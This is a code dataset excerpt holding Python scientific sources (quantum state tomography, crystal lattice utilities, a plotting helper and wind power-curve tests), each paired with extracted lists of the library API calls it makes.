code
stringlengths 31
1.05M
| apis
list | extract_api
stringlengths 97
1.91M
|
---|---|---|
import itertools
from typing import List, Tuple, Union
import numpy as np
from quara.objects.state import State
from quara.objects.povm import Povm
from quara.objects.qoperation import QOperation
from quara.objects.qoperations import SetQOperations
from quara.protocol.qtomography.standard.standard_qtomography import StandardQTomography
from quara.qcircuit.experiment import Experiment
from quara.utils.number_util import to_stream
class StandardQst(StandardQTomography):
_estimated_qoperation_type = State
def __init__(
self,
povms: List[Povm],
is_physicality_required: bool = False,
is_estimation_object: bool = False,
on_para_eq_constraint: bool = False,
eps_proj_physical: float = None,
eps_truncate_imaginary_part: float = None,
seed_data: int = None,
schedules: Union[str, List[List[Tuple]]] = "all",
):
"""Constructor
Parameters
----------
povms : List[Povm]
testers of QST.
is_physicality_required : bool, optional
whether the QOperation is physically required, by default False
is_estimation_object : bool, optional
whether the QOperation is estimation object, by default False
on_para_eq_constraint : bool, optional
whether the parameters of QOperation are on equal constraint, by default False
eps_proj_physical : float, optional
threshold epsilon where the algorithm repeats the projection in order to make estimate object is physical, by default :func:`~quara.settings.Settings.get_atol` / 10.0
eps_truncate_imaginary_part : float, optional
threshold to truncate imaginary part, by default :func:`~quara.settings.Settings.get_atol`
seed : int, optional
a seed used to generate random data, by default None.
Raises
------
ValueError
the experiment is not valid.
"""
# create Experiment
if type(schedules) == str:
self._validate_schedules_str(schedules)
if schedules == "all":
schedules = [[("state", 0), ("povm", i)] for i in range(len(povms))]
experiment = Experiment(
states=[None],
gates=[],
povms=povms,
schedules=schedules,
seed_data=seed_data,
)
self._validate_schedules(schedules)
# create SetQOperations
state = State(
povms[0]._composite_system,
np.zeros(povms[0].vecs[0].shape, dtype=np.float64),
is_physicality_required=is_physicality_required,
is_estimation_object=is_estimation_object,
on_para_eq_constraint=on_para_eq_constraint,
eps_proj_physical=eps_proj_physical,
eps_truncate_imaginary_part=eps_truncate_imaginary_part,
)
set_qoperations = SetQOperations(states=[state], gates=[], povms=[])
# initialize super class
super().__init__(experiment, set_qoperations)
# validate
if not self.is_valid_experiment():
raise ValueError(
"the experiment is not valid. all CompositeSystem of testers must have same ElementalSystems."
)
# calc num_variables
if on_para_eq_constraint:
self._num_variables = state.dim ** 2 - 1
else:
self._num_variables = state.dim ** 2
# create map
self._map_experiment_to_setqoperations = {("state", 0): ("state", 0)}
self._map_setqoperations_to_experiment = {("state", 0): ("state", 0)}
# calc and set coeff0s, coeff1s, matA and vecB
self._set_coeffs(experiment, on_para_eq_constraint, state.dim)
self._on_para_eq_constraint = on_para_eq_constraint
self._template_qoperation = self._set_qoperations.states[0]
def _validate_schedules(self, schedules):
for i, schedule in enumerate(schedules):
if schedule[0][0] != "state" or schedule[1][0] != "povm":
message = f"schedules[{i}] is invalid. "
message += 'Schedule of Qst must be in format as \'[("state", 0), ("povm", povm_index)]\', '
message += f"not '{schedule}'."
raise ValueError(message)
if schedule[0][1] != 0:
message = f"schedules[{i}] is invalid."
message += f"State index of schedule in Qst must be 0: {schedule}"
raise ValueError(message)
@property
def on_para_eq_constraint(self): # read only
return self._on_para_eq_constraint
def estimation_object_type(self) -> type:
return State
def _set_coeffs(
self, experiment: Experiment, on_para_eq_constraint: bool, dim: int
):
# coeff0s and coeff1s
self._coeffs_0th = dict()
self._coeffs_1st = dict()
tmp_coeffs_0th = []
tmp_coeffs_1st = []
for schedule_index, schedule in enumerate(self._experiment.schedules):
povm_index = schedule[-1][1]
povm = self._experiment.povms[povm_index]
for element_index, vec in enumerate(povm.vecs):
if on_para_eq_constraint:
self._coeffs_0th[(schedule_index, element_index)] = vec[
0
] / np.sqrt(dim)
self._coeffs_1st[(schedule_index, element_index)] = vec[1:]
tmp_coeffs_0th.append(vec[0])
tmp_coeffs_1st.append(vec[1:])
else:
self._coeffs_0th[(schedule_index, element_index)] = 0
self._coeffs_1st[(schedule_index, element_index)] = vec
tmp_coeffs_0th.append(0)
tmp_coeffs_1st.append(vec)
def is_valid_experiment(self) -> bool:
"""returns whether the experiment is valid.
all of the following conditions are ``True``, the state is physically correct:
- all povms have same CompositeSystem.
Returns
-------
bool
whether the experiment is valid.
"""
is_ok_povms = self.is_all_same_composite_systems(self._experiment.povms)
return is_ok_povms
def _testers(self) -> List[Povm]:
return self.experiment.povms
def _get_target_index(self, experiment: Experiment, schedule_index: int) -> int:
schedule = experiment.schedules[schedule_index]
state_index = schedule[0][1]
return state_index
def generate_dataset(self, data_nums: List[int]) -> List[List[np.ndarray]]:
"""calculates a probability distribution.
see :func:`~quara.protocol.qtomography.qtomography.QTomography.generate_dataset`
"""
raise NotImplementedError()
def generate_empi_dist(
self,
schedule_index: int,
state: State,
num_sum: int,
seed_or_generator: Union[int, np.random.Generator] = None,
) -> Tuple[int, np.ndarray]:
"""Generate empirical distribution using the data generated from probability distribution of specified schedules.
Parameters
----------
schedule_index : int
schedule index.
state : State
true object.
num_sum : int
the number of data to use to generate the experience distributions for each schedule.
seed_or_generator : Union[int, np.random.Generator], optional
If the type is int, it is assumed to be a seed used to generate random data.
If the type is Generator, it is used to generate random data.
If argument is None, np.random is used to generate random data.
Default value is None.
Returns
-------
Tuple[int, np.ndarray]
Generated empirical distribution.
"""
tmp_experiment = self._experiment.copy()
state_index = self._get_target_index(tmp_experiment, schedule_index)
tmp_experiment.states[state_index] = state
stream = to_stream(seed_or_generator)
empi_dist_seq = tmp_experiment.generate_empi_dist_sequence(
schedule_index, [num_sum], seed_or_generator=stream
)
return empi_dist_seq[0]
def generate_empi_dists(
self,
state: State,
num_sum: int,
seed_or_generator: Union[int, np.random.Generator] = None,
) -> List[Tuple[int, np.ndarray]]:
"""Generate empirical distributions using the data generated from probability distributions of all schedules.
see :func:`~quara.protocol.qtomography.qtomography.QTomography.generate_empi_dists`
"""
tmp_experiment = self._experiment.copy()
for schedule_index in range(len(tmp_experiment.schedules)):
state_index = self._get_target_index(tmp_experiment, schedule_index)
tmp_experiment.states[state_index] = state
num_sums = [num_sum] * self._num_schedules
stream = to_stream(seed_or_generator)
empi_dist_seq = tmp_experiment.generate_empi_dists_sequence(
[num_sums], seed_or_generator=stream
)
empi_dists = list(itertools.chain.from_iterable(empi_dist_seq))
return empi_dists
def generate_empi_dists_sequence(
self,
state: State,
num_sums: List[int],
seed_or_generator: Union[int, np.random.Generator] = None,
) -> List[List[Tuple[int, np.ndarray]]]:
"""Generate sequence of empirical distributions using the data generated from probability distributions of all schedules.
Parameters
----------
state : State
true object.
num_sums : List[int]
list of the number of data to use to generate the experience distributions for each schedule.
seed_or_generator : Union[int, np.random.Generator], optional
If the type is int, it is assumed to be a seed used to generate random data.
If the type is Generator, it is used to generate random data.
If argument is None, np.random is used to generate random data.
Default value is None.
Returns
-------
List[List[Tuple[int, np.ndarray]]]
sequence of list of tuples for the number of data and experience distributions for each schedules.
"""
tmp_experiment = self._experiment.copy()
list_num_sums = [num_sums] * self._num_schedules
list_num_sums_tmp = [list(num_sums) for num_sums in zip(*list_num_sums)]
for schedule_index in range(len(tmp_experiment.schedules)):
state_index = self._get_target_index(tmp_experiment, schedule_index)
tmp_experiment.states[state_index] = state
stream = to_stream(seed_or_generator)
empi_dists_sequence_tmp = tmp_experiment.generate_empi_dists_sequence(
list_num_sums_tmp, seed_or_generator=stream
)
empi_dists_sequence = [
list(empi_dists) for empi_dists in zip(*empi_dists_sequence_tmp)
]
return empi_dists_sequence
def convert_var_to_qoperation(self, var: np.ndarray) -> State:
"""converts variable to QOperation.
see :func:`~quara.protocol.qtomography.standard.standard_qtomography.StandardQTomography.convert_var_to_qoperation`
"""
template = self._template_qoperation
state = template.generate_from_var(var=var)
return state
def generate_empty_estimation_obj_with_setting_info(self) -> QOperation:
"""generates the empty estimation object with setting information.
Returns
-------
QOperation
the empty estimation object(State) with setting information.
"""
empty_estimation_obj = self._set_qoperations.states[0]
return empty_estimation_obj.copy()
def num_outcomes(self, schedule_index: int) -> int:
"""returns the number of outcomes of probability distribution of a schedule index.
Parameters
----------
schedule_index: int
Returns
-------
int
the number of outcomes
"""
assert schedule_index >= 0
assert schedule_index < self.num_schedules
povm_index = self._experiment.schedules[schedule_index][1][1]
return len(self._experiment._povms[povm_index].vecs)
|
[
"numpy.zeros",
"quara.utils.number_util.to_stream",
"quara.qcircuit.experiment.Experiment",
"itertools.chain.from_iterable",
"quara.objects.qoperations.SetQOperations",
"numpy.sqrt"
] |
[((2227, 2321), 'quara.qcircuit.experiment.Experiment', 'Experiment', ([], {'states': '[None]', 'gates': '[]', 'povms': 'povms', 'schedules': 'schedules', 'seed_data': 'seed_data'}), '(states=[None], gates=[], povms=povms, schedules=schedules,\n seed_data=seed_data)\n', (2237, 2321), False, 'from quara.qcircuit.experiment import Experiment\n'), ((2921, 2971), 'quara.objects.qoperations.SetQOperations', 'SetQOperations', ([], {'states': '[state]', 'gates': '[]', 'povms': '[]'}), '(states=[state], gates=[], povms=[])\n', (2935, 2971), False, 'from quara.objects.qoperations import SetQOperations\n'), ((8084, 8112), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (8093, 8112), False, 'from quara.utils.number_util import to_stream\n'), ((9026, 9054), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (9035, 9054), False, 'from quara.utils.number_util import to_stream\n'), ((10803, 10831), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (10812, 10831), False, 'from quara.utils.number_util import to_stream\n'), ((2542, 2592), 'numpy.zeros', 'np.zeros', (['povms[0].vecs[0].shape'], {'dtype': 'np.float64'}), '(povms[0].vecs[0].shape, dtype=np.float64)\n', (2550, 2592), True, 'import numpy as np\n'), ((9210, 9254), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['empi_dist_seq'], {}), '(empi_dist_seq)\n', (9239, 9254), False, 'import itertools\n'), ((5370, 5382), 'numpy.sqrt', 'np.sqrt', (['dim'], {}), '(dim)\n', (5377, 5382), True, 'import numpy as np\n')]
|
import numpy as np
from sys import platform
import os
def get_slash():
if platform == 'win32':
return '\\'
else:
return '/'
def kpoint_segment(first, second, pps):
"""
:param first: first k-point
:param second: second k-point
:param pps: points per segment
:return: normalized (by k-space distance) segment for bands plot
"""
first = np.array(first)
second = np.array(second)
dist = np.linalg.norm(second - first)
segment = np.linspace(0, dist, pps)
return segment
def frac2cart(frac_point, lat, twopi=False):
"""
transforms a fractional point to cartesian. assumes that the lattice already has 2pi included
:param frac_point: fractional coordiante
:param lat: lattice. can be either real space or reciprocal space. should be a matrix where each row is a
lattice vector
:param twopi: determines weather a multiplication by 2pi is needed
:return: cartesian point
"""
frac_point = np.array(frac_point)
lat = np.array(lat)
for i in range(3):
lat[i] *= frac_point[i]
if twopi:
cart = 2 * np.pi * lat.sum(0)
else:
cart = lat.sum(0)
return cart.tolist()
def smooth(vec, step):
vec2 = np.zeros(len(vec))
for i in range(step - 1, len(vec), step):
vec2[i - (step - 1):i + 1] = vec[i - (step - 1):i + 1].sum() / step
return vec2
def cart2frac(coordinates, lattice):
lattice = np.array(lattice)
coordinates = np.array(coordinates)
if coordinates.shape == (3,):
return np.linalg.solve(lattice.T, coordinates).tolist()
else:
fracs = np.zeros(len(coordinates) * 3).reshape(len(coordinates), 3)
for i, coordinate in enumerate(coordinates):
fracs[i] = np.linalg.solve(lattice.T, coordinate)
return fracs.tolist()
def gauge_fix(vec):
"""
fixes the gauge of a vector or a list of vectors (returns a numpy array)
"""
vec = np.array(vec, dtype=complex)
if type(vec[0]) == np.ndarray:
for i in range(len(vec)):
vec[i] = vec[i] * np.exp(-1j * np.angle(vec[i].sum()))
if vec[i].sum() < 0:
vec[i] = -vec[i]
else:
vec = vec * np.exp(-1j * np.angle(vec.sum()))
if vec.sum() < 0:
vec = -vec
return vec
def ints2vec(unit_cell, integers):
"""
:param unit_cell:
:param integers: list of 3 integers [n1, n2, n3] such that R = n1a1 + n2a2 + n3a3
:return: a lattice vector as a numpy array
"""
unit_cell = np.array(unit_cell)
integers = np.array(integers)
r = np.zeros(3)
for i in range(3):
r += integers[i] * unit_cell[i]
return np.array(r)
|
[
"numpy.zeros",
"numpy.linalg.norm",
"numpy.array",
"numpy.linspace",
"numpy.linalg.solve"
] |
[((390, 405), 'numpy.array', 'np.array', (['first'], {}), '(first)\n', (398, 405), True, 'import numpy as np\n'), ((419, 435), 'numpy.array', 'np.array', (['second'], {}), '(second)\n', (427, 435), True, 'import numpy as np\n'), ((447, 477), 'numpy.linalg.norm', 'np.linalg.norm', (['(second - first)'], {}), '(second - first)\n', (461, 477), True, 'import numpy as np\n'), ((492, 517), 'numpy.linspace', 'np.linspace', (['(0)', 'dist', 'pps'], {}), '(0, dist, pps)\n', (503, 517), True, 'import numpy as np\n'), ((989, 1009), 'numpy.array', 'np.array', (['frac_point'], {}), '(frac_point)\n', (997, 1009), True, 'import numpy as np\n'), ((1020, 1033), 'numpy.array', 'np.array', (['lat'], {}), '(lat)\n', (1028, 1033), True, 'import numpy as np\n'), ((1447, 1464), 'numpy.array', 'np.array', (['lattice'], {}), '(lattice)\n', (1455, 1464), True, 'import numpy as np\n'), ((1483, 1504), 'numpy.array', 'np.array', (['coordinates'], {}), '(coordinates)\n', (1491, 1504), True, 'import numpy as np\n'), ((1954, 1982), 'numpy.array', 'np.array', (['vec'], {'dtype': 'complex'}), '(vec, dtype=complex)\n', (1962, 1982), True, 'import numpy as np\n'), ((2537, 2556), 'numpy.array', 'np.array', (['unit_cell'], {}), '(unit_cell)\n', (2545, 2556), True, 'import numpy as np\n'), ((2572, 2590), 'numpy.array', 'np.array', (['integers'], {}), '(integers)\n', (2580, 2590), True, 'import numpy as np\n'), ((2599, 2610), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (2607, 2610), True, 'import numpy as np\n'), ((2685, 2696), 'numpy.array', 'np.array', (['r'], {}), '(r)\n', (2693, 2696), True, 'import numpy as np\n'), ((1765, 1803), 'numpy.linalg.solve', 'np.linalg.solve', (['lattice.T', 'coordinate'], {}), '(lattice.T, coordinate)\n', (1780, 1803), True, 'import numpy as np\n'), ((1554, 1593), 'numpy.linalg.solve', 'np.linalg.solve', (['lattice.T', 'coordinates'], {}), '(lattice.T, coordinates)\n', (1569, 1593), True, 'import numpy as np\n')]
|
import numpy as np
from pyglib.model import circauxi
import shutil,subprocess
cmd = ['/home/ykent/WIEN_GUTZ/bin2/CyGutz', '-r', '-1']
for i,u in enumerate(np.arange(1.0,0.9,-10)):
print(' Running with u = {}'.format(u))
circauxi.gutz_model_setup(u=u, nmesh=5000, norb=3, tiny=0.0, mu=0.0)
subprocess.call(cmd)
shutil.copyfile('WH_RL_BEST.h5', 'WH_RL_INIT.h5')
shutil.copyfile('WH_RL_BEST.h5', 'WH_RL_INIT.h5_{}'.format(u))
|
[
"pyglib.model.circauxi.gutz_model_setup",
"shutil.copyfile",
"subprocess.call",
"numpy.arange"
] |
[((157, 181), 'numpy.arange', 'np.arange', (['(1.0)', '(0.9)', '(-10)'], {}), '(1.0, 0.9, -10)\n', (166, 181), True, 'import numpy as np\n'), ((230, 298), 'pyglib.model.circauxi.gutz_model_setup', 'circauxi.gutz_model_setup', ([], {'u': 'u', 'nmesh': '(5000)', 'norb': '(3)', 'tiny': '(0.0)', 'mu': '(0.0)'}), '(u=u, nmesh=5000, norb=3, tiny=0.0, mu=0.0)\n', (255, 298), False, 'from pyglib.model import circauxi\n'), ((303, 323), 'subprocess.call', 'subprocess.call', (['cmd'], {}), '(cmd)\n', (318, 323), False, 'import shutil, subprocess\n'), ((328, 377), 'shutil.copyfile', 'shutil.copyfile', (['"""WH_RL_BEST.h5"""', '"""WH_RL_INIT.h5"""'], {}), "('WH_RL_BEST.h5', 'WH_RL_INIT.h5')\n", (343, 377), False, 'import shutil, subprocess\n')]
|
# coding:utf-8
from bokeh.charts import TimeSeries, show, output_file
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import json
from itertools import cycle
## 在这里设置好字体等因素
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['Adobe Heiti Std'] # 指定默认字体
mpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题
mpl.rcParams['savefig.dpi'] = 300
class Visualizer :
def __init__(self, pandas=[]) :
self.pandas = pandas
def scale_axis(self, tuple_range, scale) :
middle = (tuple_range[0] + tuple_range[1]) / 2.0
return (middle + scale* (i - middle) for i in tuple_range)
def data_middle(self, tuple_range, *args, **kwargs) :
a = max(tuple_range)
return (-0.1*a, 1.2*a)
def show_3_variables(self, var_list) :
#self.pandas.plot(x=self.pandas.time);
"""
依次是红绿蓝的样式,使用各自的配色。其中第三个主要是参考线
观察前两个随着时间的变化的关系。
"""
slices = self.pandas[var_list]
fig, ax1 = plt.subplots()
ax2, ax3 = ax1.twinx(), ax1.twinx()
ax1.set_xlabel("simulation time")
ax1.set_ylabel(var_list[0])
ax2.set_ylabel(var_list[1])
ax3.set_ylabel(var_list[2])
rspine = ax3.spines['right']
rspine.set_position(('axes', 1.20))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
fig.subplots_adjust(right=0.75)
## 注意在画legend的时候的特殊技巧
styles = ['r-', 'g-', 'b--']
ax1.plot(slices[var_list[0]], styles[0],label=var_list[0])
ax1.plot(0,0, styles[1],label=var_list[1])
ax1.plot(0,0, styles[2],label=var_list[2])
## 注意坐标轴$(min,max)$的放缩变换是$(min+max)/2 + k*(x - (min+max)/2)
print(ax2.get_ylim())
ax2.plot(slices[var_list[1]], styles[1],label=var_list[1])
ax2.set_ylim( self.scale_axis(ax2.get_ylim(),1.2) )
ax3.plot(slices[var_list[2]], styles[2],label=var_list[2])
ax3.set_ylim( self.scale_axis(ax3.get_ylim(),1.4) )
#slices[var_list[1]].plot(ax=ax2, style='r-',label=var_list[0], secondary_y=True)
#slices[var_list[2]].plot(ax=ax3, style='g-',label=var_list[0])
ax1.legend(loc='upper left') ## lower/upper/center left/right
#plt.legend(loc='best')
plt.show()
# d = Pandas Dataframe,
# ys = [ [cols in the same y], [cols in the same y], [cols in the same y], .. ]
# any different y axis <http://stackoverflow.com/questions/7733693/matplotlib-overlay-plots-with-different-scales>
def show_n_vars_on_right(self, var_list_group
, line_styles = cycle(['-','-','-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',
'1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])
, markers = cycle(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])
) :
d = self.pandas
ys = var_list_group
#from itertools import cycle
fig, ax = plt.subplots()
axes = [ax]
for y in ys[1:]:
# Twin the x-axis twice to make independent y-axes.
axes.append(ax.twinx())
extra_ys = len(axes[2:])
# Make some space on the right side for the extra y-axes.
if extra_ys>0:
temp = 0.85
if extra_ys<=2:
temp = 0.75
elif extra_ys<=4:
temp = 0.6
if extra_ys>5:
raise Exception('you are being ridiculous, too more axes')
fig.subplots_adjust(right=temp)
right_additive = (0.98-temp)/float(extra_ys)
# Move the last y-axis spine over to the right by x% of the width of the axes
i = 1.
for ax in axes[2:]:
ax.spines['right'].set_position(('axes', 1.+right_additive*i))
ax.set_frame_on(True)
ax.patch.set_visible(False)
ax.yaxis.set_major_formatter(matplotlib.ticker.OldScalarFormatter())
i +=1.
# To make the border of the right-most axis visible, we need to turn the frame
# on. This hides the other plots, however, so we need to turn its fill off.
cols = []
lines = []
#line_styles = cycle(['-','-','-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',
# '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])
#markers = cycle(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])
colors = cycle(matplotlib.rcParams['axes.color_cycle'])
for ax,y in zip(axes,ys):
ls=next(line_styles)
ms=next(markers)
if len(y)==1:
col = y[0]
cols.append(col)
color = next(colors)
lines.append(ax.plot(d[col],linestyle =ls, marker=ms, label = col,color=color))
ax.set_ylabel(col,color=color)
#ax.tick_params(axis='y', colors=color)
ax.spines['right'].set_color(color)
ax.set_ylim( self.data_middle(ax.get_ylim(), 1.2+0.5*np.random.random()) )
else:
for col in y:
color = next(colors)
lines.append(ax.plot(d[col],linestyle =ls,marker=ms, label = col,color=color))
cols.append(col)
ax.set_ylabel(', '.join(y))
ax.set_ylim( self.data_middle(ax.get_ylim(), 1.2+0.5*np.random.random()) )
#ax.tick_params(axis='y')
axes[0].set_xlabel(d.index.name)
lns = lines[0]
for l in lines[1:]:
lns +=l
labs = [l.get_label() for l in lns]
axes[0].legend(lns, labs, loc="upper left")
#axes[0].set_xlabel("simulation time")
#for i in range(0,len(ys[0])) :
axes[0].set_xlabel("simulation time")
plt.show()
def show_n_var_on_left (self, var_list) :
# Twin the x-axis twice to make independent y-axes.
axes = [ax, ax.twinx(), ax.twinx()]
# Make some space on the right side for the extra y-axis.
fig.subplots_adjust(right=0.75)
# Move the last y-axis spine over to the right by 20% of the width of the axes
axes[1].spines['right'].set_position(('axes', -0.25))
axes[2].spines['right'].set_position(('axes', -0.5))
# To make the border of the right-most axis visible, we need to turn the frame
# on. This hides the other plots, however, so we need to turn its fill off.
axes[-1].set_frame_on(True)
axes[-1].patch.set_visible(False)
# And finally we get to plot things...
colors = ('Green', 'Red', 'Blue')
intAxNo = 0
for ax, color in zip(axes, colors):
intAxNo += 1
data = np.random.random(1) * np.random.random(10)
ax.plot(data, marker='o', linestyle='none', color=color)
if (intAxNo > 1):
if (intAxNo == 2):
ax.set_ylabel('%s Thing' % color, color=color, labelpad = -40 )
elif (intAxNo == 3):
ax.set_ylabel('%s Thing' % color, color=color, labelpad = -45 )
ax.get_yaxis().set_tick_params(direction='out')
else:
ax.set_ylabel('%s Thing' % color, color=color, labelpad = +0 )
ax.tick_params(axis='y', colors=color)
axes[0].set_xlabel('X-axis')
plt.show()
def bokeh_show(self) :
df= pd.DataFrame(self.pandas)
df.consumer_payments = df.consumer_payments.cumsum()
df.cost_for_consumer = df.cost_for_consumer.cumsum()
df.plot(x=df.start_time);
#df.to_csv(open("data.csv", 'w'))
obvalues = pd.DataFrame(dict(r_q=df['r_q'],pay=df['consumer_payments'],sf_q=df['sf_q']))
#p = TimeSeries(obvalues, legend=True, title="Stocks", ylabel='Stock Prices')
show(p)
def merged_show(self) :
a = []
df= pd.DataFrame(self.pandas)
df.benefit= df.benefit.cumsum()
df.cost_for_customer = df.cost_for_customer.cumsum()
a.append(df.benefit)
#df = pd.DataFrame(a)
#print(a)
df = pd.concat(a, axis=1)
#print(df)
df.plot()
plt.legend(loc='best')
plt.show()
|
[
"pandas.DataFrame",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"bokeh.charts.show",
"numpy.random.random",
"matplotlib.ticker.OldScalarFormatter",
"itertools.cycle",
"matplotlib.pyplot.subplots",
"pandas.concat"
] |
[((1024, 1038), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1036, 1038), True, 'import matplotlib.pyplot as plt\n'), ((2288, 2298), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2296, 2298), True, 'import matplotlib.pyplot as plt\n'), ((2611, 2764), 'itertools.cycle', 'cycle', (["['-', '-', '-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>', '1',\n '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_']"], {}), "(['-', '-', '-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',\n '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])\n", (2616, 2764), False, 'from itertools import cycle\n'), ((2802, 2938), 'itertools.cycle', 'cycle', (["['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P',\n '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_']"], {}), "(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p',\n 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])\n", (2807, 2938), False, 'from itertools import cycle\n'), ((3059, 3073), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3071, 3073), True, 'import matplotlib.pyplot as plt\n'), ((4632, 4678), 'itertools.cycle', 'cycle', (["matplotlib.rcParams['axes.color_cycle']"], {}), "(matplotlib.rcParams['axes.color_cycle'])\n", (4637, 4678), False, 'from itertools import cycle\n'), ((5993, 6003), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6001, 6003), True, 'import matplotlib.pyplot as plt\n'), ((7624, 7634), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7632, 7634), True, 'import matplotlib.pyplot as plt\n'), ((7677, 7702), 'pandas.DataFrame', 'pd.DataFrame', (['self.pandas'], {}), '(self.pandas)\n', (7689, 7702), True, 'import pandas as pd\n'), ((8094, 8101), 'bokeh.charts.show', 'show', (['p'], {}), '(p)\n', (8098, 8101), False, 'from bokeh.charts import TimeSeries, show, output_file\n'), ((8161, 8186), 'pandas.DataFrame', 'pd.DataFrame', (['self.pandas'], {}), '(self.pandas)\n', (8173, 8186), True, 'import pandas as pd\n'), ((8378, 8398), 'pandas.concat', 'pd.concat', (['a'], {'axis': '(1)'}), '(a, axis=1)\n', (8387, 8398), True, 'import pandas as pd\n'), ((8444, 8466), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (8454, 8466), True, 'import matplotlib.pyplot as plt\n'), ((8475, 8485), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8483, 8485), True, 'import matplotlib.pyplot as plt\n'), ((4004, 4042), 'matplotlib.ticker.OldScalarFormatter', 'matplotlib.ticker.OldScalarFormatter', ([], {}), '()\n', (4040, 4042), False, 'import matplotlib\n'), ((6958, 6977), 'numpy.random.random', 'np.random.random', (['(1)'], {}), '(1)\n', (6974, 6977), True, 'import numpy as np\n'), ((6980, 7000), 'numpy.random.random', 'np.random.random', (['(10)'], {}), '(10)\n', (6996, 7000), True, 'import numpy as np\n'), ((5218, 5236), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (5234, 5236), True, 'import numpy as np\n'), ((5578, 5596), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (5594, 5596), True, 'import numpy as np\n')]
|
"""
SPDX-FileCopyrightText: 2019 oemof developer group <<EMAIL>>
SPDX-License-Identifier: MIT
"""
import pandas as pd
import numpy as np
import pytest
from pandas.util.testing import assert_frame_equal
from windpowerlib.power_curves import (smooth_power_curve,
wake_losses_to_power_curve)
import windpowerlib.wind_turbine as wt
class TestPowerCurves:
@classmethod
def setup_class(self):
self.test_turbine = {'hub_height': 100,
'turbine_type': 'E-126/4200'}
def test_smooth_power_curve(self):
test_curve = wt.WindTurbine(**self.test_turbine).power_curve
parameters = {'power_curve_wind_speeds': test_curve['wind_speed'],
'power_curve_values': test_curve['value'],
'standard_deviation_method': 'turbulence_intensity'}
# Raise ValueError - `turbulence_intensity` missing
with pytest.raises(ValueError):
parameters['standard_deviation_method'] = 'turbulence_intensity'
smooth_power_curve(**parameters)
# Test turbulence_intensity method
parameters['turbulence_intensity'] = 0.5
wind_speed_values_exp = pd.Series([6.0, 7.0, 8.0, 9.0, 10.0],
name='wind_speed')
power_values_exp = pd.Series([
1141906.9806766496, 1577536.8085282773, 1975480.993355767,
2314059.4022704284, 2590216.6802602503], name='value')
smoothed_curve_exp = pd.DataFrame(data=pd.concat([
wind_speed_values_exp, power_values_exp], axis=1))
smoothed_curve_exp.index = np.arange(5, 10, 1)
assert_frame_equal(smooth_power_curve(**parameters)[5:10],
smoothed_curve_exp)
# Test Staffel_Pfenninger method
parameters['standard_deviation_method'] = 'Staffell_Pfenninger'
power_values_exp = pd.Series([
929405.1348918702, 1395532.5468724659, 1904826.6851982325,
2402659.118305521, 2844527.1732449625], name='value')
smoothed_curve_exp = pd.DataFrame(
data=pd.concat([wind_speed_values_exp, power_values_exp], axis=1))
smoothed_curve_exp.index = np.arange(5, 10, 1)
assert_frame_equal(smooth_power_curve(**parameters)[5:10],
smoothed_curve_exp)
# Raise ValueError - misspelling
with pytest.raises(ValueError):
parameters['standard_deviation_method'] = 'misspelled'
smooth_power_curve(**parameters)
def test_wake_losses_to_power_curve(self):
test_curve = wt.WindTurbine(**self.test_turbine).power_curve
parameters = {'power_curve_wind_speeds': test_curve['wind_speed'],
'power_curve_values': test_curve['value'],
'wind_farm_efficiency': 0.9}
# Test constant efficiency
power_curve_exp = test_curve.copy(deep=True)
power_curve_exp['value'] = power_curve_exp['value'].values * 0.9
assert_frame_equal(wake_losses_to_power_curve(**parameters),
power_curve_exp)
# Test efficiency curve
parameters['wind_farm_efficiency'] = pd.DataFrame(
pd.concat([pd.Series(np.arange(1, 26, 1)),
pd.Series([
1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85,
0.86, 0.87, 0.89, 0.92, 0.95, 0.95, 0.96, 0.99,
0.95, 0.98, 0.97, 0.99, 1.0, 1.0, 1.0, 1.0])],
axis=1))
parameters['wind_farm_efficiency'].columns = ['wind_speed',
'efficiency']
power_curve_exp = test_curve.copy(deep=True)
power_curve_exp['value'] = (
power_curve_exp['value'].values * parameters[
'wind_farm_efficiency']['efficiency'])
assert_frame_equal(wake_losses_to_power_curve(**parameters),
power_curve_exp)
